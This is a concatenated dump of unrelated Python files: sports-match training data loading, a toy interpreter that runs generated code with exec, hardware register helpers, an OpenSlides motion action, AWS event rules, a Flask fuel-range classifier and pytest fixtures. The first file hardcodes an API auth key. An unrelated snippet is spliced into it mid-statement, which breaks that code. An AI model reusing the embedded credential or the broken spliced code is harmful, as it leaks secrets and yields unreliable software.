tba\nimport numpy as np\nfrom match import Team, MatchQM\n\npitt_key, pembroke_key, ash_key = '2018ncgre', '2018ncpem', '2018ncash'\nforsyth_key, state_champs = '2018ncwin', '2018nccmp'\nnc_events = ['2018ncgre', '2018ncpem', '2018ncash', '2018ncwin', '2018nccmp']\nfnc_key = '2018nc'\ntba.auth_key = 'vbxm8opdrSZqgnjzor6lVtLuZKTpre4oo2WR3Zw8iS3NmmI9p1G83sgC59ZmB9eF'\nstates = MatchQM(state_champs)\n\nnc_teams = [Team.keyToNum(key) for key in tba._fetch('district/%s/teams/keys' % (fnc_key))]\nstate_teams = [Team.keyToNum(key) for key in tba._fetch('event/%s/teams/keys' % (state_champs))]\n\ntrain_data_file = open(\"training_data.txt\", \"w+\")\ntrain_labels_file = open(\"training_labels.txt\", \"w+\")\n\n# 32 teams, 10 features\n# dictionary for easy access\nbg_data = {}\nindex = 0\nfor count in range(len(nc_teams)):\n bg_data[nc_teams[count]] = Team.compile_stats(nc_teams[count])\n print(\"Finished Team #\", count)\nprint(\"Finished creating NC team dictionary\")\n\n# assemble training data\nfor event in nc_events:\n myMatch = MatchQM(event)\n all_matches = tba._fetch('event/%s/matches' % (event))\n # 6 teams, 10 features\n mtch_dta = np.empty((6, 10))\n for match in all_matches:\n match_num = match['match_number']\n print(match_num)\n red_teams, blue_teams = myMatch.get_teams(match_num, 'red'), myMatch.get_teams(match_num, 'blue')\n for team in red_teams:\n if team in 
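# A small check of the cell-cleaning step in COVID_Data_Crawler.py above: the regex grabs
# the text between a cell's closing '>' and the next '<', and the replace chain strips the
# markers plus thousands separators before float() is attempted. The sample cell below is
# invented for the demo.
import re

cell_html = '<td style="text-align:right">1,234,567</td>'
covid_regex = re.compile(r">+[+]?\d*,?\d*,?\d*[.]?\d*\D*<+")
cell = covid_regex.search(cell_html).group()  # '>1,234,567<'
print(float(cell.replace(">", "").replace("<", "").replace("+", "").replace(",", "")))  # 1234567.0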
bg_data:\n for point in bg_data[team]:\n train_data_file.write(str(point) + ' ')\n train_data_file.write('\\n')\n print(bg_data[team])\n else:\n for point in range(10):\n train_data_file.write('0')\n train_data_file.write('\\n')\n print(\"----- Not an NC Team -----\")\n for team in blue_teams:\n if team in bg_data:\n for point in bg_data[team]:\n train_data_file.write(str(point) + ' ')\n train_data_file.write('\\n')\n print(bg_data[team])\n else:\n for point in range(10):\n train_data_file.write('0')\n train_data_file.write('\\n')\n print(\"----- Not an NC Team -----\")\n train_data_file.write('match\\n')\n print(\"Finished a match\")\n\n # training labels\n red_score = myMatch.red_total(match_num)\n blue_score = myMatch.blue_total(match_num)\n # 0 - red, 1 - blue\n score = blue_score / (blue_score + red_score)\n train_labels_file.write(str(score))\n train_labels_file.write(\"\\n\")\n print(\"------- FINISHED AN EVENT -------\")\n \ntrain_data_file.close()\ntrain_labels_file.close()","sub_path":"load-data-train.py","file_name":"load-data-train.py","file_ext":"py","file_size_in_byte":2730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"46615562","text":"from hParsing import readFile, separate\nfrom sys import argv, exit\nimport selfmodule as m\n\"\"\"\nE = {P} arg {+ S}\n\"\"\"\n\npfx = {\"cd\":\"m.cd\",\"ls\":\"m.ls\",\"out\":\"m.out\"}\n\nvar = {\"pwd\":\"m.pwd()\",\"..\":\"\\\"..\\\"\"}\nsfx = [\"sort\",\"chop\",\"aslist\",\"dirs\",\"docs\",\"separated\",\"joined\"]\ninside = False\n\ndef Expression(code):\n ret = []\n i = 0\n while i < len(code):\n if code[i] == \"\\\"\":\n # the Word is a string. Jump to the next \\\"\n # \"...\"\n j = code[i+1:].index(\"\\\"\") + i + 1\n ret.append(\" \".join(code[i:j+1]))\n i = j\n elif code[i] in var:\n # Assigned variables are parsed as their value\n # [var-name] ===> [var-value]\n if i+1 < len(code):\n if code[i+1] == \"=\":\n # Unless it's a declaration\n # [var-name] = ... 
\n ret.append(code[i])\n else: ret.append(var[code[i]])\n else:\n ret.append(var[code[i]])\n elif code[i] == \"=\":\n # Variable declaration\n if i > 0 and i+1 < len(code):\n # [var-name] = [expression] \\n\n if not code[i-1].isdigit():\n j = code[i+1:].index(\"\\n\") + i + 1\n var[code[i-1]] = \"\".join(Expression(code[i+1:j]))\n ret.append(\"=\" + var[code[i-1]] + \"\\n\")\n i = j\n else: m.fatalError(\"VariableNameError\")\n else:\n m.fatalError(\"AssignmentError\")\n elif code[i] == \"+\":\n if i+1 < len(code):\n if code[i+1] in sfx:\n # Suffix gives extra variable parameters\n ret.append(code[i+1]+\"=True\")\n i+= 1\n else: m.fatalError(\"SuffixNameError\")\n else:\n print(\"SuffixPositionError\")\n exit()\n elif code[i] in pfx:\n # Prefix declaration, separate arguments with commas\n ret.append(pfx[code[i]]+\"(\")\n if \"\\n\" in code[i+1:]:\n j = code[i+1:].index(\"\\n\") + i + 1\n else: j = len(code) - 1\n # Arguments\n obj = SubExpression(code[i+1:j])\n if len(obj) > 0:\n ret.append(\",\".join(obj))\n ret[-1] += \")\"\n ret.append(\"\\n\")\n i = j\n else:\n ret.append(code[i])\n i+= 1\n return ret\n\ndef SubExpression(code):\n ret = Expression(code)\n if len(ret) <= 1: return ret\n else: return ret[:-1]\n\ndef Parse(code):\n ret = Expression(code)\n return ret\n\n\ncode = separate(readFile(argv[1]), \"\\\"=\")\nj = []\nfor i in code.split(\"\\n\"):\n j+=(i.split()+[\"\\n\"])\nj.append(\"\\n\")\nprint(\"Executing...\")\ng = \"\".join(Parse(j))\nprint(\"Returned: \\n\"+g)\ntry:\n exec(g)\nexcept:\n print(\":[\")","sub_path":"Prototypes/self/P0/selfP0.py","file_name":"selfP0.py","file_ext":"py","file_size_in_byte":2852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"442495012","text":"#! usr/bin/python\n# coding=utf-8\n\nimport time\n\n\nclass SoundUtils:\n\n @classmethod\n def bell(cls, _time, _time_step):\n \"\"\"\n 响铃_time次,每次间隔_time_step秒\n :param _time:\n :param _time_step:\n :return:\n \"\"\"\n for i in range(_time):\n print(\"\\a\")\n time.sleep(_time_step)\n","sub_path":"r_utils/sound_utils.py","file_name":"sound_utils.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"171235494","text":"\n\"\"\"\nAn interface to the main iADC control register. The one at address 0.\n\nContains some methods for modifying the parameters of this register\n\"\"\"\n\nclass IAdcRegistersControl:\n def __init__(self, analogue_selection='indep', clock_selection='in', cal_mode='no_cal', clk_speed=800):\n \"\"\" The control register created by default is designed to sample the I Q channels\n independantly (ie: each get RF input gets sampled by its core) and in phase.\n\n analogue_selection -- 'indep', 'inter_I' or 'inter_Q'. See #set_analogue_selection.\n clock_selection -- 'in', 'quad' or 'neg'. See #set_clock_selection\n cal_mode -- 'no_cal', 'new_cal', or 'keep_last_cal'.\n clk_speed -- clock speed in MHz\n \"\"\"\n self.value = 0\n self.value |= (0b1 << 2) # disable chip version output bit\n self.value |= (0b1 << 3) # set demux to 1:2\n clk_bits = 0b00 if (clk_speed<125) else 0b01 if (clk_speed<250) else 0b10 if (clk_speed<500) else 0b11\n self.value |= (clk_bits << 12) # control wait bit calibration value is dependent on clk speed\n self.value |= (1 << 14) # set FDataReady to Fs/2. 
I don't know what this means\n self.set_analogue_selection(analogue_selection)\n self.set_clock_selection(clock_selection)\n self.set_cal_mode(cal_mode)\n\n def set_analogue_selection(self, mode):\n \"\"\"\n Specifies how the RF channels will be connected to the ADC cores.\n Either independant or one channel interleaved\n\n mode --\n indep: InI -> ADCI ; InQ -> ADCQ\n inter_I: InI -> ADCI ; InI -> ADCQ\n inter_Q: InQ -> ADCI ; InQ -> ADCQ\n \"\"\"\n bits_map = {'inter_Q': 0b00, 'inter_I': 0b10, 'indep': 0b11}\n self.value &= ~(0b11 << 4)\n self.value |= (bits_map[mode] << 4)\n\n def set_clock_selection(self, mode):\n \"\"\"\n Specifies the phase between each core's clock\n\n mode --\n in: in phase.\n quad: quadtrature\n neg: 180 degree phase shift (negative)\n \"\"\"\n bit_map = {'neg': 0b00, 'in': 0b10, 'quad': 0b11}\n self.value &= ~(0b11 << 6) # clear bits 7 downto 6\n self.value |= (bit_map[mode] << 6) \n\n def set_cal_mode(self, mode):\n \"\"\"\n Set to no_cal to be able to modify the XXXX registers manually\n\n cal -- 'no_cal', 'new_cal' or 'keep_last_cal'\n \"\"\"\n bits_map = {'no_cal': 0b00, 'keep_last_cal': 0b01, 'new_cal': 0b11}\n # clear bits 10 and 11\n self.value &= ~(0b11 << 10)\n # set bits as per specification\n self.value |= (bits_map[mode] << 10)\n","sub_path":"iadc_registers_control.py","file_name":"iadc_registers_control.py","file_ext":"py","file_size_in_byte":2670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"468495065","text":"import time\nfrom typing import Any, Dict\n\nfrom ....models.models import Motion\nfrom ....shared.exceptions import ActionException\nfrom ....shared.patterns import POSITIVE_NUMBER_REGEX, Collection, FullQualifiedId\nfrom ....shared.schema import id_list_schema, optional_id_schema\nfrom ...mixins.create_action_with_dependencies import CreateActionWithDependencies\nfrom ...util.default_schema import DefaultSchema\nfrom ...util.register import register_action\nfrom ..agenda_item.agenda_creation import (\n CreateActionWithAgendaItemMixin,\n agenda_creation_properties,\n)\nfrom ..agenda_item.create import AgendaItemCreate\nfrom ..list_of_speakers.create import ListOfSpeakersCreate\nfrom ..list_of_speakers.list_of_speakers_creation import (\n CreateActionWithListOfSpeakersMixin,\n)\nfrom ..motion_submitter.create import MotionSubmitterCreateAction\nfrom .sequential_numbers_mixin import SequentialNumbersMixin\nfrom .set_number_mixin import SetNumberMixin\n\n\n@register_action(\"motion.create\")\nclass MotionCreate(\n CreateActionWithDependencies,\n CreateActionWithAgendaItemMixin,\n SequentialNumbersMixin,\n SetNumberMixin,\n CreateActionWithListOfSpeakersMixin,\n):\n \"\"\"\n Create Action for motions.\n \"\"\"\n\n model = Motion()\n schema = DefaultSchema(Motion()).get_create_schema(\n optional_properties=[\n \"meeting_id\",\n \"title\",\n \"number\",\n \"state_extension\",\n \"sort_parent_id\",\n \"category_id\",\n \"block_id\",\n \"supporter_ids\",\n \"tag_ids\",\n \"attachment_ids\",\n \"origin_id\",\n \"text\",\n \"lead_motion_id\",\n \"statute_paragraph_id\",\n \"reason\",\n ],\n required_properties=[\"meeting_id\", \"title\"],\n additional_optional_fields={\n \"workflow_id\": optional_id_schema,\n \"submitter_ids\": id_list_schema,\n **Motion().get_property(\"amendment_paragraph_$\", POSITIVE_NUMBER_REGEX),\n **agenda_creation_properties,\n },\n )\n dependencies = [AgendaItemCreate, ListOfSpeakersCreate]\n\n def update_instance(self, instance: Dict[str, Any]) -> Dict[str, Any]:\n # 
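# A quick sanity check of the bit-field arithmetic in IAdcRegistersControl above: the
# default register (indep analogue selection, in-phase clock, no_cal, 800 MHz) is just
# the OR of the individual masks.
value = 0
value |= 0b1 << 2    # chip-version output disabled
value |= 0b1 << 3    # demux 1:2
value |= 0b11 << 12  # wait bits for clk_speed >= 500 MHz
value |= 1 << 14     # FDataReady = Fs/2
value |= 0b11 << 4   # 'indep' analogue selection
value |= 0b10 << 6   # 'in' (in-phase) clock selection
value |= 0b00 << 10  # 'no_cal'
print(hex(value))    # 0x70bc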
special check logic\n if instance.get(\"lead_motion_id\"):\n if instance.get(\"statute_paragraph_id\"):\n raise ActionException(\n \"You can't give both of lead_motion_id and statute_paragraph_id.\"\n )\n if not instance.get(\"text\") and not instance.get(\"amendment_paragraph_$\"):\n raise ActionException(\n \"Text or amendment_paragraph_$ is required in this context.\"\n )\n if instance.get(\"text\") and instance.get(\"amendment_paragraph_$\"):\n raise ActionException(\n \"You can't give both of text and amendment_paragraph_$\"\n )\n if instance.get(\"text\") and \"amendment_paragraph_$\" in instance:\n del instance[\"amendment_paragraph_$\"]\n if instance.get(\"amendment_paragraph_$\") and \"text\" in instance:\n del instance[\"text\"]\n else:\n if not instance.get(\"text\"):\n raise ActionException(\"Text is required\")\n if instance.get(\"amendment_paragraph_$\"):\n raise ActionException(\n \"You can't give amendment_paragraph_$ in this context\"\n )\n\n # fetch all needed settings and check reason\n meeting = self.datastore.get(\n FullQualifiedId(Collection(\"meeting\"), instance[\"meeting_id\"]),\n [\n \"motions_default_workflow_id\",\n \"motions_default_amendment_workflow_id\",\n \"motions_default_statute_amendment_workflow_id\",\n \"motions_reason_required\",\n ],\n )\n if meeting.get(\"motions_reason_required\") and not instance.get(\"reason\"):\n raise ActionException(\"Reason is required\")\n\n # calculate state_id from workflow_id\n workflow_id = instance.pop(\"workflow_id\", None)\n if workflow_id is None:\n if instance.get(\"lead_motion_id\"):\n workflow_id = meeting.get(\"motions_default_amendment_workflow_id\")\n elif instance.get(\"statute_paragraph_id\"):\n workflow_id = meeting.get(\n \"motions_default_statute_amendment_workflow_id\"\n )\n else:\n workflow_id = meeting.get(\"motions_default_workflow_id\")\n if workflow_id:\n workflow = self.datastore.get(\n FullQualifiedId(Collection(\"motion_workflow\"), workflow_id),\n [\"first_state_id\"],\n )\n instance[\"state_id\"] = workflow.get(\"first_state_id\")\n else:\n raise ActionException(\n \"No matching default workflow defined on this meeting\"\n )\n\n # check for origin_id\n if instance.get(\"origin_id\"):\n meeting = self.datastore.get(\n FullQualifiedId(Collection(\"meeting\"), instance[\"meeting_id\"]),\n [\"committee_id\"],\n )\n forwarded_from = self.datastore.get(\n FullQualifiedId(Collection(\"motion\"), instance[\"origin_id\"]),\n [\"meeting_id\"],\n )\n forwarded_from_meeting = self.datastore.get(\n FullQualifiedId(Collection(\"meeting\"), forwarded_from[\"meeting_id\"]),\n [\"committee_id\"],\n )\n committee = self.datastore.get(\n FullQualifiedId(\n Collection(\"committee\"), forwarded_from_meeting[\"committee_id\"]\n ),\n [\"forward_to_committee_ids\"],\n )\n if meeting[\"committee_id\"] not in committee.get(\n \"forward_to_committee_ids\", []\n ):\n raise ActionException(\n f\"Committee id {meeting['committee_id']} not in {committee.get('forward_to_committee_ids', [])}\"\n )\n\n # create submitters\n submitter_ids = instance.pop(\"submitter_ids\", None)\n if not submitter_ids:\n submitter_ids = [self.user_id]\n self.apply_instance(instance)\n action_data = []\n for user_id in submitter_ids:\n action_data.append({\"motion_id\": instance[\"id\"], \"user_id\": user_id})\n self.execute_other_action(MotionSubmitterCreateAction, action_data)\n\n instance[\"sequential_number\"] = self.get_sequential_number(\n instance[\"meeting_id\"]\n )\n # set created and last_modified\n timestamp = round(time.time())\n 
instance[\"created\"] = timestamp\n instance[\"last_modified\"] = timestamp\n self.set_number(\n instance,\n instance[\"meeting_id\"],\n instance[\"state_id\"],\n instance.get(\"lead_motion_id\"),\n instance.get(\"category_id\"),\n )\n\n return instance\n","sub_path":"openslides_backend/action/actions/motion/create.py","file_name":"create.py","file_ext":"py","file_size_in_byte":7013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"598111104","text":"import boto3 \nimport json\nimport os\n\n\n## Declare resources and clients: \nevents = boto3.client('events')\n\n# 1. Run CreateRole to attach a trust agreement to a role. \n# 2. Run CreatePolicy to create a new managed policy from the policy document. \n# 3. Load in the role to a new object, and Run attach policy to attach the policy we created in step 2. \n# 4. Use the role to generate cloudwatch event calls. \n\n## Create event rule: \ndef put_instance_rule(instance_id):\n event_pattern = {\n \"source\": [\"aws.ec2\"],\n \"detail-type\": [\"EC2 Instance State-change Notification\"],\n \"detail\":{\n \"state\":[\"running\",\"stopped\",'shutting-down'],\n \"instance-id\":[instance_id]}}\n ep_encoded = json.dumps(event_pattern)\n name = \"Monitor\"+instance_id\n print('environ_param',os.environ)\n response = events.put_rule(\n Name = name,\n EventPattern = ep_encoded,\n State = 'ENABLED',\n Description = 'on-the-fly monitoring setup for instance '+instance_id,\n RoleArn =os.environ['cwrolearn'])\n return response,name\n\n## Create target: \ndef put_instance_target(rulename):\n response = events.put_targets(\n Rule = rulename,\n Targets = [\n {\n 'Arn':os.environ['figlambarn'],\n 'Id':os.environ['figlambid']}])\n return response\n\n","sub_path":"sam_locanmf_stack/.aws-sam/build/S3DelObjectFunction/utilsparam/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":1407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"348893316","text":"# Load libraries\nfrom threading import Timer\n\nimport pandas as pd\nimport numpy as np\nfrom sklearn.cluster import KMeans\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import classification_report\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.linear_model import LogisticRegression\n\nimport requests\nfrom flask import Flask, jsonify\n\nimport json\n\nfrom json import JSONEncoder\n\nimport time\n\n\nclass NumpyArrayEncoder(JSONEncoder):\n def default(self, obj):\n if isinstance(obj, np.ndarray):\n return obj.tolist()\n return JSONEncoder.default(self, obj)\n\n\nclass RepeatedTimer(object):\n def __init__(self, interval, function, *args, **kwargs):\n self._timer = None\n self.interval = interval\n self.function = function\n self.args = args\n self.kwargs = kwargs\n self.is_running = False\n self.start()\n\n def _run(self):\n self.is_running = False\n self.start()\n self.function(*self.args, **self.kwargs)\n\n def start(self):\n if not self.is_running:\n self._timer = Timer(self.interval, self._run)\n self._timer.start()\n self.is_running = True\n\n def stop(self):\n self._timer.cancel()\n self.is_running = False\n\n\napp = Flask(__name__)\n\ndistance = 0\nfuel = 0\n\n\n@app.route('/cloud/can_go', methods=['GET'])\n# @cache.cached(timeout=300)\ndef speed_data():\n\n start_time = time.time()\n number_array = model_train()\n numpyData = {\"array\": number_array}\n encodedNumpyData = json.dumps(numpyData, 
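# A usage sketch for the CloudWatch Events helpers above, assuming the cwrolearn,
# figlambarn and figlambid environment variables are populated as the module expects
# (this talks to AWS, so it is shown commented out; the instance id is hypothetical):
# response, rule_name = put_instance_rule('i-0123456789abcdef0')
# put_instance_target(rule_name)
# The resulting rule fires the configured Lambda whenever that instance enters the
# running, stopped or shutting-down state.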
cls=NumpyArrayEncoder) # use dump() to write array into file\n print(\"---y_train %s seconds ---\" % (time.time() - start_time))\n return encodedNumpyData\n\n\ndef get_ac_control_data():\n try:\n req = requests.get(\"http://localhost:3103/ac_control/output\")\n decodedArrays = json.loads(req.text)\n\n finalNumpyArray = np.asarray(decodedArrays[\"array\"])\n\n except requests.exceptions.ConnectionError:\n return \"Service unavailable\"\n return finalNumpyArray\n\n\ndef get_speed_data():\n try:\n req = requests.get(\"http://localhost:3202/speed/output\")\n decodedArrays = json.loads(req.text)\n\n finalNumpyArray = np.asarray(decodedArrays[\"array\"])\n\n except requests.exceptions.ConnectionError:\n return \"Service unavailable\"\n return finalNumpyArray\n\n\ndef get_amount_fuel_data():\n global distance, fuel\n\n try:\n req = requests.get(\"http://localhost:6201/cloud/get_mobile_data\")\n decodedArrays = json.loads(req.text)\n\n distance = float(decodedArrays[\"distance\"])\n fuel = float(decodedArrays[\"fuel\"])\n\n print(distance)\n print(fuel)\n\n except requests.exceptions.ConnectionError:\n return \"Service unavailable\"\n\n\ndef model_train():\n global distance, fuel\n\n get_amount_fuel_data()\n\n # speed_output = [float(i) for i in get_speed_data()]\n # ac_output = [float(i) for i in get_ac_control_data()]\n #\n # print(len(speed_output))\n # print(len(ac_output))\n #\n # if len(speed_output) > len(ac_output):\n # min = len(ac_output)\n # else:\n # min = len(speed_output)\n #\n # X = np.array((speed_output[:min], ac_output[:min])).T\n #\n # df = pd.DataFrame(X)\n #\n # print(\"df\")\n # print(df)\n\n dataset = pd.read_csv(\"datasettt.csv\")\n df = dataset.iloc[:, [0, 1]]\n\n print(df)\n\n kmeans = KMeans(n_clusters=4, random_state=0)\n kmeans = kmeans.fit(df)\n\n df['labels'] = kmeans.labels_\n print(df['labels'].values.tolist())\n # interpretation of cluster values\n l = len(kmeans.labels_)\n for i in range(l):\n if kmeans.labels_[i] == 3:\n kmeans.labels_[i] = 1\n\n elif kmeans.labels_[i] == 0:\n kmeans.labels_[i] = 3\n\n elif kmeans.labels_[i] == 2:\n kmeans.labels_[i] = 4\n\n elif kmeans.labels_[i] == 1:\n kmeans.labels_[i] = 2\n\n df['labels'] = kmeans.labels_\n y = df['labels'].values\n\n array = df.values\n X = array[:, 0:2]\n\n # split the data set\n X_train, X_validation, Y_train, Y_validation = train_test_split(X, y, test_size=0.20, random_state=0)\n\n # Make predictions for validating dataset\n model = LogisticRegression(solver='liblinear', multi_class='ovr')\n model.fit(X_train, Y_train)\n predictions = model.predict(X_validation)\n\n # Evaluate predictions\n print('Accuracy: ', accuracy_score(Y_validation, predictions))\n\n print('confusion_matrix: ')\n print(confusion_matrix(Y_validation, predictions))\n\n print('classification_report: ')\n print(classification_report(Y_validation, predictions))\n\n ###############check whether the vehicle can reach to the destination or not?################\n predict = model.predict([[4, 2]])\n print(predict)\n # distance = 250\n # litre = 20\n\n if predict == 1:\n rate = 11\n elif predict == 2:\n rate = 12.5\n elif predict == 3:\n rate = 13.5\n elif predict == 4:\n rate = 15\n\n output = rate * fuel\n\n if output >= distance:\n print(1)\n return 1\n elif output < distance:\n print(0)\n return 0\n\n\n# passenger_data_automated = RepeatedTimer(5, get_passenger_count_data)\n\nif __name__ == '__main__':\n app.run(port=6202, 
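# A usage sketch for the RepeatedTimer class above: the callback re-arms itself every
# `interval` seconds (first firing after one interval, not immediately) until stop() is
# called, as in the commented-out passenger_data_automated line below.
import time

def tick():
    print('tick')

rt = RepeatedTimer(1, tick)  # assumes the RepeatedTimer defined above is in scope
try:
    time.sleep(3.5)          # tick fires roughly three times
finally:
    rt.stop()                # always cancel the pending Timer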
host='0.0.0.0')\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"428450042","text":"class Solution:\n def nextPermutation(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: void Do not return anything, modify nums in-place instead.\n \"\"\"\n if not nums:\n return\n\n i1 = len(nums) - 1\n while i1 >= 1:\n if nums[i1 - 1] < nums[i1]:\n break\n i1 -= 1\n\n print(i1) # debug output\n i2 = len(nums) - 1\n if i1 != 0:\n while i2 >= i1:\n if nums[i1-1] < nums[i2]:\n nums[i1-1], nums[i2] = nums[i2], nums[i1-1]\n break\n i2 -= 1\n\n nums[i1::] = list(reversed(nums[i1:]))\n\ns = Solution()\ns.nextPermutation([1,2,3,9,8,6])\n\n# Scan the sequence from the tail for two adjacent elements, the earlier one called first and\n# the later one called second, such that first < second. Then scan from the tail again for an\n# element number with first < number; swap first with number, and reverse everything from second\n# onwards (second included) to obtain the next permutation.\n\n# example:\n# 6,3,4,9,8,7,1\n# here first = 4, second = 9\n# scanning from the tail, the first value greater than first is 7\n# swap 4 and 7 (the swap above); the sequence becomes 6,3,7,9,8,4,1\n# then re-sort the part from second=9 onwards in ascending order to make the whole result minimal,\n# i.e. just reverse it (at this point it is guaranteed to be a descending sequence)\n# giving the final result: 6,3,7,1,4,8,9\n","sub_path":"solutions/array/problem31_Next Permutation.py","file_name":"problem31_Next Permutation.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"233591825","text":"import pytest\nfrom allure_commons_test.report import AllureReport\nfrom doctest import script_from_examples\nimport mock\nimport allure_commons\nfrom contextlib import contextmanager\nfrom allure_commons.logger import AllureMemoryLogger\n\npytest_plugins = \"pytester\"\n\n\ndef pytest_configure(config):\n config.addinivalue_line(\n \"markers\", \"real_logger: mark test to run with a real allure logger\"\n )\n\n\n@contextmanager\ndef fake_logger(path, logger):\n blocked_plugins = []\n for name, plugin in allure_commons.plugin_manager.list_name_plugin():\n allure_commons.plugin_manager.unregister(plugin=plugin, name=name)\n blocked_plugins.append(plugin)\n\n with mock.patch(path) as ReporterMock:\n ReporterMock.return_value = logger\n yield\n\n for plugin in blocked_plugins:\n allure_commons.plugin_manager.register(plugin)\n\n\nclass AlluredTestdir:\n def __init__(self, testdir, request):\n self.testdir = testdir\n self.request = request\n self.allure_report = None\n\n def parse_docstring_source(self):\n docstring = self.request.node.function.__doc__ or self.request.node.module.__doc__\n source = script_from_examples(docstring).replace(\"#\\n\", \"\\n\")\n self.testdir.makepyfile(source)\n\n def parse_docstring_path(self):\n doc_file = self.request.node.function.__doc__ or self.request.node.module.__doc__\n example_dir = self.request.config.rootdir.join(doc_file.strip())\n with open(example_dir, encoding=\"utf-8\") as f:\n content = f.read()\n source = script_from_examples(content)\n self.testdir.makepyfile(source)\n\n def run_with_allure(self, *args, **kwargs):\n if self.request.node.get_closest_marker(\"real_logger\"):\n self.testdir.runpytest(\"--alluredir\", self.testdir.tmpdir, *args, **kwargs)\n self.allure_report = AllureReport(self.testdir.tmpdir.strpath)\n else:\n self.allure_report = AllureMemoryLogger()\n with fake_logger(\"allure_pytest.plugin.AllureFileLogger\", self.allure_report):\n self.testdir.runpytest(\"--alluredir\", self.testdir.tmpdir, *args, **kwargs)\n\n return self.allure_report\n\n\n@pytest.fixture\ndef allured_testdir(testdir, request):\n return AlluredTestdir(testdir, 
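# Tracing nextPermutation above on the sample call: for [1, 2, 3, 9, 8, 6] the scan stops
# at i1 = 3 (nums[2] = 3 < nums[3] = 9), i2 finds 6 (the rightmost value > 3), the swap
# gives [1, 2, 6, 9, 8, 3], and reversing the suffix from index 3 yields the result:
s = Solution()  # assumes the Solution class defined above is in scope
nums = [1, 2, 3, 9, 8, 6]
s.nextPermutation(nums)
print(nums)  # [1, 2, 6, 3, 8, 9]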
request)\n\n\n@pytest.fixture\ndef executed_docstring_source(allured_testdir):\n allured_testdir.parse_docstring_source()\n allured_testdir.run_with_allure()\n return allured_testdir\n\n\n@pytest.fixture\ndef executed_docstring_path(allured_testdir):\n allured_testdir.parse_docstring_path()\n allured_testdir.run_with_allure()\n return allured_testdir\n","sub_path":"allure-pytest/test/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":2653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"576261417","text":"import pandas as pd\n\ndef drop_partial(df, dataset):\n '''function for dropping partial cases'''\n if dataset == \"BPI_Challenge_2012-training.csv\" or dataset == \"BPI_Challenge_2012-test.csv\":\n print(\"drop partial cases of\", dataset)\n # select last events of each case\n last_data = df.copy()\n boolean = ~last_data.duplicated(['case concept:name'], keep='last') # takes last appearances of the cases\n df_last = last_data[boolean]\n\n # get more insight\n df_group = df_last.groupby(['event concept:name', 'event lifecycle:transition']).count()\n df_group['percentage'] = (df_group['eventID '] /\n df_last.groupby(['event concept:name', 'event lifecycle:transition']).count().sum()[\n 'eventID ']) * 100\n df_group.sort_values(by='percentage', ascending=False)\n df_group[['percentage']]\n\n # select non-partial events of cases\n bool1 = (df_last['event concept:name'] == 'W_Valideren aanvraag') & (\n df_last['event lifecycle:transition'] == 'COMPLETE')\n bool2 = (df_last['event concept:name'] == 'A_DECLINED')\n bool3 = (df_last['event concept:name'] == 'A_CANCELLED')\n bool4 = (df_last['event concept:name'] == 'A_ACTIVATED')\n bool5 = (df_last['event concept:name'] == 'W_Afhandelen leads') # extra\n bool6 = (df_last['event concept:name'] == 'W_completeren aanvraag') # extra\n bool7 = (df_last['event concept:name'] == 'W_Nabellen offertes') & (\n df_last['event lifecycle:transition'] == 'COMPLETE') # extra\n df_last_no_partial = df_last[bool1 + bool2 + bool3 + bool4 + bool5 + bool6 + bool7]\n\n # select all events of non-partial cases\n df = df[df['case concept:name'].isin(list(df_last_no_partial['case concept:name']))]\n return df\n\n elif dataset == \"Road_Traffic_Fine_Management_Process-training.csv\" or \\\n dataset == \"Road_Traffic_Fine_Management_Process-test.csv\":\n print(\"drop partial cases of\", dataset)\n last_data = df.copy()\n boolean_last = ~last_data.duplicated(['case concept:name'], keep='last') # takes last appearances of the cases\n df_last = last_data[boolean_last]\n df_last['event'] = 'last'\n\n # select second last events of each case\n df_no_last = pd.concat([df, df_last]).drop_duplicates(keep=False)\n df_no_last = df[~df['eventID '].isin(list(df_last['eventID ']))]\n\n boolean_sec_last = ~df_no_last.duplicated(['case concept:name'], keep='last')\n df_sec_last = df_no_last[boolean_sec_last]\n df_sec_last['event'] = 'second_last'\n\n # make dataframe with the two last events of each case\n df_two_lasts = pd.concat([df_sec_last, df_last])\n df_two_lasts = df_two_lasts.reset_index()\n\n # get more insight\n df_group = df_two_lasts.groupby(['event concept:name', 'event']).count()\n df_group['percentage'] = (df_group['eventID '] /\n df_two_lasts.groupby(['event concept:name', 'event']).count().sum()['eventID ']) * 100\n df_group.sort_values(by='percentage', ascending=False)\n df_group[['percentage']]\n\n # select non-partial events of cases\n bool1 = (df_two_lasts['event'] == 'last') & 
